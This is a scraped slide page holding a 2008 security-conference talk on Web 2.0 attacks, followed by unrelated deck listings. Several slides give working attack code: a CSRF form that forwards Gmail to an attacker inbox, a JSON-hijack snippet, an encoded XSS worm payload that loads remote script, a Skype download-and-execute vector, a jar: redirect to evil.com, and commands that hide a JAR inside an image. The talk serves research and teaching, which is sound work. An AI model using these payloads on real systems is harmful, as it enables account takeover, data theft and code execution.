risk 2008
play

RISK 2008 pdp information security researcher, hacker, founder of - PowerPoint PPT Presentation

Jan 14, 2023 •508 likes •1.04k views

RISK 2008 pdp information security researcher, hacker, founder of GNUCITIZEN Cutting-edge Think Tank ABOUT GNUCITIZEN Think tank Research Training Consultancy Ethical Hacker Outfit Responsible disclosure We have

  2. RISK 2008

  3. pdp information security researcher, hacker, founder of GNUCITIZEN

  4. Cutting-edge Think Tank

  5. ABOUT GNUCITIZEN  Think tank  Research  Training  Consultancy  Ethical Hacker Outfit  Responsible disclosure  We have nothing to hide  Tiger Team  The only active Tiger Team in UK.  Proud to have some of the best pros in our team.

  6. OTHERS  Hakiri  Hacker Lifestyle  Spin Hunters  Social Hacking Research House

  7. WEB2.0 SECURITY overview of various Web2.0 vulnerabilities and threats

  8. OBJECTIVES  I was planning to...  Research Design Issues.  Innovate.  Mix & Match Ideas.  I am not a bug hunter, therefore...  Concentrate on the practicalities.  Look for things I could use in my work.  Have fun.

  9. WHAT IS WEB2.0

  10. WEB2.0 IS...  Marketing buzzword  Invented by O'Reilly Media in 2003  Wikis, Blogs, AJAX, Social Networks, etc...  APIs, SOA (Service Oriented Architecture)  Data in the Cloud  Applications on Demand

  11. WEB2.0 SECURITY  What is Web2.0 Security?  The security model of Web2.0 is represented by the grand total of every participating technology.

  12. LET'S BEGIN web2.0 issue run-down

  13. EVIL TWIN ATTACKS

  14. EVIL TWIN ATTACKS  Social Networks connect people.  Everybody is welcome to join.  There are no means to verify user's identity.  Therefore identities are forgable.  LinkedIn can be abused.  Facebook can be abused.  Any other social network can be abused.

  15. SOCIAL PHISHING  Social Networks like user-generated content.  Embedding images is a standard function.  Images can point to protected URLs.  Basic Authentication will pop-up upon rendering.  Users will be tricked into entering credentials.  ...because it is annoying. :)  ...or maybe because like to comply with the system  ...all in all, it breaks the trust model

  16. HACKING OPENID  Affected by the general types of vulnerabilities.  Raises phishing concerns.  Better then the current identification processes.  ...but could have a devastating effect.

  17. LIVE PROFILING  Snooping onto people's feeds  Twitter, Blogs, etc  Snooping onto people's locations  Location extraction services, Yahoo Pipes  Extracting meta data from public content  Pictures contains sensitive information like geo coordinates.  Querying Social Networks  People give sensitive information for free.  Your friends give information about you.

  18. THE GMAIL HIJACK TECHNIQUE

  19. THE GMAIL HIJACK TECHNIQUE

  20. THE GMAIL HIJACK TECHNIQUE

  21. THE GMAIL HIJACK TECHNIQUE  Via a CSRF Redirection Utility http://www.gnucitizen.org/util/csrf  ?_method=POST&_enctype=multipart/form-data &_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf &cf2_emc=true &cf2_email=evilinbox@mailinator.com &cf1_from &cf1_to &cf1_subj &cf1_has &cf1_hasnot &cf1_attach=true &tfi&s=z &irf=on&nvp_bu_cftb=Create%20Filter

  22. THE GMAIL HIJACK TECHNIQUE  HTML Code <html>  <body> <form name="form" method="POST" enctype="multipart/form-data" action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf"> <input type="hidden" name="cf2_emc" value="true"/> <input type="hidden" name="cf2_email" value="evilinbox@mailinator.com"/> <input type="hidden" name="cf1_from" value=""/> <input type="hidden" name="cf1_to" value=""/> <input type="hidden" name="cf1_subj" value=""/> <input type="hidden" name="cf1_has" value=""/><input type="hidden" name="cf1_hasnot" value=""/> <input type="hidden" name="cf1_attach" value="true"/> <input type="hidden" name="tfi" value=""/> <input type="hidden" name="s" value="z"/> <input type="hidden" name="irf" value="on"/> <input type="hidden" name="nvp_bu_cftb" value="Create Filter"/> </form> <script>form.submit()</script> </body> </html>

  23. SOMEONE GOT HACKED It is unfortunate, but it gives us a good case study!

  24. HIJACKING JSON  Affects most AJAX applications  It has been used to hack Google accounts  Simple array overwrite technique function Array() {  var obj = this; var ind = 0; var getNext; getNext = function(x) { obj[ind++] setter = getNext; if(x) { var str = x.toString(); if ((str != 'ct') && (typeof x != 'object') && (str.match(/@/))) { // alert email alert(str); } } }; this[ind++] setter = getNext; }

  25. THE SAMY WORM

  26. THE POWNCE WORM

  27. THE POWNCE WORM  Hypothetical Worm based on a real bug.  Point of injection:  [html junk] [point of injection; 16 chars max] [html junk] [correctly sanitized, safely rendered user-supplied data] [html junk]

  28. THE POWNCE WORM  Pseudo exploit: [html junk]  */<script>/* [html junk] */ XSS Payload which does not need to contain HTML meta characters /* [html junk]  Actual exploit: [html junk]  */<script>/* [html junk] */document.write(atob(/PHNjcmlwdCBzcmM9Imh0dHA6Ly9ja2Vycy5vcmcvcyI+PC9z Y3JpcHQ+PCEtLQ==/.toString().substr(1,56)));/* [html junk]

  29. THE POWNCE WORM

  30. VULNERABILITIES IN SKYPE  Deadly Combination  DailyMotion/Metacafe + XSS + Skype = 0wnage  Code <script>  var x=new ActiveXObject("WScript.Shell"); var someCommands="Some command-line commands to download and execute binary file"; x.run('cmd.exe /C "'+someCommands+'"'); </script>  Vector skype:?multimedia_mood&partner=metacafe&id=1053760   Credits  Miroslav Lučinskij  Aviv Raff

  31. VULNERABILITIES IN SKYPE  Pwnable via the AIR  AIRPWN  Karma  We knew about it last year!

  32. MAKING MONEY WITH XSS  We need large number of XSS vectors.  For each vector we inject ads for payload.  We use Web2.0 distribution channels to infect.  Social Bookmarking sites  Crowdsourcing sites  Social profiles  ..etc  We make money!

  33. FIREFOX JAR: URL HANDLER ISSUES  Basic jar: Example  jar: [url to archive] ! [path to file] jar: https://domain.com/path/to/jar.jar ! /Pictures/a.jpg   When uploaded and accessed it executes within the origins of the [url to archive]

  34. FIREFOX CROSS-SITE SCRIPTING CONDITIONS OVER JAR: URLS  Requires 302 Open Redirect  <html><head> <script language="javascript">window.location= " jar:http://groups.google.com/searchhi story/url?url=http://evil.com/evil.jar !/payload.htm ";</script> </head></html>  The one above pwns Google  Vector developed by Beford

  35. THE JAVA RUNTIME AND JAR  It pokes services behind the Firewall  It works with File Upload facilities  Social Engineering is Required!!!  It thinks of pictures like JARs

  36. THE JAVA RUNTIME AND JAR  Get an image from the Web:  fancyimage.jpg  Prepare a JAR:  jar cvf evil.jar Evil*.class  Put them together:  copy /B fancyimage.jpg + evil.jar fancyevilimage.jpg or cp fancyimage.jpg fancyevilimage.jpg cat evi.jar >> fancyevilimage.jpg

  37. DRIVE BY JAVA

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Investor Community Conference Call Q1 2008 2008 2008 2008 Risk Review Risk Review Risk

Investor Community Conference Call Q1 2008 2008 2008 2008 Risk Review Risk Review Risk

Investor Community Conference Call Q1 2008 2008 2008 2008 Risk Review Risk Review Risk Review Risk Review Bob McGlashan Executive Vice President and Chief Risk Officer, Enterprise Risk and Portfolio Management March 4 2008 Forward

488 views • 10 slides
2008 2008 2008 2008 Investor Community Conference Call Risk Review Risk Review Risk

2008 2008 2008 2008 Investor Community Conference Call Risk Review Risk Review Risk

2008 2008 2008 2008 Investor Community Conference Call Risk Review Risk Review Risk Review Risk Review Bob McGlashan Executive Vice President and Chief Risk Officer, Enterprise Risk and Portfolio Management March 4 2008 Forward

469 views • 19 slides
2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive

2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive

2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive Vice President and Chief Risk Officer August 26 2008 Forward Looking Statements Caution Regarding Forward-Looking Statements Bank of Montreals

666 views • 11 slides
2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive

2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive

2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive Vice President and Chief Risk Officer November 25 2008 Forward Looking Statements Caution Regarding Forward-Looking Statements Bank of

351 views • 12 slides
2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive

2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive

2008 2008 2008 2008 Investor Community Conference Call Risk Review Tom Flynn Executive Vice President and Chief Risk Officer May 27 2008 Forward Looking Statements Caution Regarding Forward-Looking Statements Bank of Montreals

711 views • 18 slides
Investor Community Conference Call Q2 2008 2008 2008 2008 Risk Review Tom Flynn Executive

Investor Community Conference Call Q2 2008 2008 2008 2008 Risk Review Tom Flynn Executive

Investor Community Conference Call Q2 2008 2008 2008 2008 Risk Review Tom Flynn Executive Vice President and Chief Risk Officer May 27 2008 Forward Looking Statements Caution Regarding Forward-Looking Statements Bank of Montreals

270 views • 9 slides
Investor Community Conference Call Q4 2008 2008 2008 2008 Risk Review Tom Flynn Executive

Investor Community Conference Call Q4 2008 2008 2008 2008 Risk Review Tom Flynn Executive

Investor Community Conference Call Q4 2008 2008 2008 2008 Risk Review Tom Flynn Executive Vice President and Chief Risk Officer November 25 2008 Forward Looking Statements Caution Regarding Forward-Looking Statements Bank of

492 views • 6 slides
Filtration Shrinkage and Credit Risk Second Princeton Credit Risk Conference, May 2008 Philip

Filtration Shrinkage and Credit Risk Second Princeton Credit Risk Conference, May 2008 Philip

Filtration Shrinkage and Credit Risk Second Princeton Credit Risk Conference, May 2008 Philip Protter, Cornell University May 23, 2008 Credit Risk Credit risk investigates an entity (corporation, bank, individual) that borrows funds, promises

931 views • 59 slides
Strategic Business Risk Winnipeg- March 18, 2008 What is Strategic Risk? Risks that could

Strategic Business Risk Winnipeg- March 18, 2008 What is Strategic Risk? Risks that could

Strategic Business Risk Winnipeg- March 18, 2008 What is Strategic Risk? Risks that could cause severe financial loss or fundamentally undermine the competitive position of a company The risks that industry leading firms must manage if

331 views • 29 slides
Risk Panel Financial October 27, 2008 Financial Risk Management Panel Brent Callinicos,

Risk Panel Financial October 27, 2008 Financial Risk Management Panel Brent Callinicos,

Risk Panel Financial October 27, 2008 Financial Risk Management Panel Brent Callinicos, Treasurer, Google Fx Risk Management Jim Colby, Assistant Treasurer, Honeywell International Interest Rate Risk Management Dennis

576 views • 13 slides
The Risk and Cost of Job Loss in Canada, The Risk and Cost of Job Loss in Canada, 1978-2008

The Risk and Cost of Job Loss in Canada, The Risk and Cost of Job Loss in Canada, 1978-2008

The Risk and Cost of Job Loss in Canada, The Risk and Cost of Job Loss in Canada, 1978-2008 Ren Morissette, Hanqing Qiu and Ping Ching Winnie Chan R M i tt H i Qi d Pi Chi Wi i Ch Social Analysis Division Statistics Canada

538 views • 36 slides
The Market Risk system The Market Risk system An Overview David Harper Head of Market Risk IT

The Market Risk system The Market Risk system An Overview David Harper Head of Market Risk IT

The Market Risk system The Market Risk system An Overview David Harper Head of Market Risk IT Dominique Delarue Market Risk IT Functional Architect 14 March 2008 Whats the story? Partition Number of positions a day (thousands) 120,000

532 views • 41 slides
Risk Management Workshop 1 Risk management workshop Why do we Risk Risk and need risk

Risk Management Workshop 1 Risk management workshop Why do we Risk Risk and need risk

FREE Lifelong Learning Event for Fasset Members Risk Management Workshop 1 Risk management workshop Why do we Risk Risk and need risk assessment control matrix management process Governance Risk appetite Agenda for and risk Risk

1.28k views • 105 slides
Enterprise Risk Management Presented by Rotimi Okpaise B.Sc, ASA, FIA at the CIINs 2008

Enterprise Risk Management Presented by Rotimi Okpaise B.Sc, ASA, FIA at the CIINs 2008

Enterprise Risk Management Presented by Rotimi Okpaise B.Sc, ASA, FIA at the CIINs 2008 Professional Forum Index 1. Introduction Introduction 1. 2. Definition of Risk and ERM Definition of Risk and ERM 2. 3. Financial &amp; Non Financial

844 views • 34 slides
Talk Risk Managem ent and Resolution Strategies for established and novel Technologies in the

Talk Risk Managem ent and Resolution Strategies for established and novel Technologies in the

Talk Risk Managem ent and Resolution Strategies for established and novel Technologies in the low head, sm all Hydropow er Market Patrick Wiemann, 13/ 06/ 2008 Risk Management in the low head, small Hydropower Market 13.06.2008 &gt; &gt; I

1.47k views • 26 slides
On Multi-Period Risk Functionals Georg Ch. Pflug September 25, 2008 Georg Ch. Pflug On

On Multi-Period Risk Functionals Georg Ch. Pflug September 25, 2008 Georg Ch. Pflug On

On Multi-Period Risk Functionals Georg Ch. Pflug September 25, 2008 Georg Ch. Pflug On Multi-Period Risk Functionals Why to measure risk/acceptability In longer term planning such as portfolio planning, pension fund management,

752 views • 37 slides
Automatic Wrapper Adaptation by Tree Edit Distance Matching E. Ferrara 1 R. Baumgartner 2 1

Automatic Wrapper Adaptation by Tree Edit Distance Matching E. Ferrara 1 R. Baumgartner 2 1

Automatic Wrapper Adaptation by Tree Edit Distance Matching E. Ferrara 1 R. Baumgartner 2 1 Department of Mathematics University of Messina, Italy 2 Lixto Software GmbH Vienna, Austria 2nd International Workshop on Combining Intelligent Methods

711 views • 32 slides
Deutsche Welle guido.baumhauer@dw-world.de Profile &amp; Distribution Strategy Guido

Deutsche Welle guido.baumhauer@dw-world.de Profile &amp; Distribution Strategy Guido

Guido Baumhauer Tel.: +49 228 429 2152 Deutsche Welle guido.baumhauer@dw-world.de Profile &amp; Distribution Strategy Guido Baumhauer, Managing Director of Strategy, Marketing and Distribution Radio Social Web Podcast Blogs target

123 views • 10 slides
Integrating Human and Machine Document Annotation for Sensemaking Simon Buckingham Shum gnes

Integrating Human and Machine Document Annotation for Sensemaking Simon Buckingham Shum gnes

Integrating Human and Machine Document Annotation for Sensemaking Simon Buckingham Shum gnes Sndor Anna De Liddo Michelle Bachler Hewlett Grant Report Project template report RESULTS XIP-annotated report Discourse analysis with the

730 views • 35 slides
Training professional staff in Some demo examples weve created Web 2.0 the UWA Online

Training professional staff in Some demo examples weve created Web 2.0 the UWA Online

What Ill cover Convincing you this is worthwhile! How the training program works Training professional staff in Some demo examples weve created Web 2.0 the UWA Online Principles, tips and guidelines Student Journey

339 views • 4 slides
CSpace CSpace CSpace CSpace A More Practical and A More Practical and A

CSpace CSpace CSpace CSpace A More Practical and A More Practical and A

CSpace CSpace CSpace CSpace A More Practical and A More Practical and A More Practical and A More Practical and Customizable Repository Platform Customizable Repository Platform Customizable Repository Platform

500 views • 31 slides
An Introduction to Social Mining Vladimir Gorovoy and Yana Volkovich @yvolkovich

An Introduction to Social Mining Vladimir Gorovoy and Yana Volkovich @yvolkovich

An Introduction to Social Mining Vladimir Gorovoy and Yana Volkovich @yvolkovich Barcelona Media, Information, Technology &amp; Society Group Barcelona, Spain @vgorovoy Yandex, Yandex.Uslugi Saint Petersburg, Russia August,

676 views • 46 slides
Automatically Constructing Semantic Web Services from Online Sources Craig A. Knoblock Jos

Automatically Constructing Semantic Web Services from Online Sources Craig A. Knoblock Jos

Automatically Constructing Semantic Web Services from Online Sources Craig A. Knoblock Jos Luis Ambite, Sirish Darbha, Aman Goel, Kristina Lerman, Rahul Parundekar, and Tom Russ University Southern California Goal Automatically build

870 views • 38 slides
Social Media Personality Types A view from Social Interaction Design by Adrian Chan

Social Media Personality Types A view from Social Interaction Design by Adrian Chan

Social Media Personality Types A view from Social Interaction Design by Adrian Chan www.gravity7.com Part I Introduction to the Concepts Overview This presentation belongs to social interaction design, and offers a design approach to

1k views • 40 slides

More recommend